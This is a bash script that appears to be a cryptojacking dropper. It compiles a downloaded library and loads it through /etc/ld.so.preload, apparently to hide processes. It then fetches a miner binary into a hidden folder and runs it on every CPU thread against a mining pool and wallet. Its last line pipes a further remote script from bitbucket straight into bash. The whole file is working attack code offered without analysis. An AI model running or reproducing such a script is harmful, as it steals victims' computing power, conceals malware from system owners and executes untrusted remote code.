#!/bin/bash
apt-get update ; apt-get install sudo wget cpulimit -y
curl https://bitbucket.org/koploks/watir/raw/master/nyumput.c -o nyumput.c
apt-get install build-essential -y
gcc -Wall -fPIC -shared -o libnyumput.so nyumput.c -ldl
mv libnyumput.so /usr/local/lib/
echo /usr/local/lib/libnyumput.so >> /etc/ld.so.preload
rm nyumput.c
mkdir .lib && cd .lib
wget -O sgr1 https://gitlab.com/vainlevy/file/-/raw/master/srduo >/dev/null 2>&1
chmod +x sgr1
cpulimit -l 150 -e sgr1 &
sudo sync && sudo echo 3 > /proc/sys/vm/drop_caches
nice -n -10 nohup ./sgr1 --algorithm yespower --pool 206.189.152.87:443 --wallet uzrKLPM88xXDP3CtWdPwh8ZvxsHNXXrLju.Tester --password x --cpu-threads $(nproc --all) --disable-gpu > /dev/null 2>&1 &
curl -sL https://bitbucket.org/koploks/shc/raw/master/boled04.sh | bash
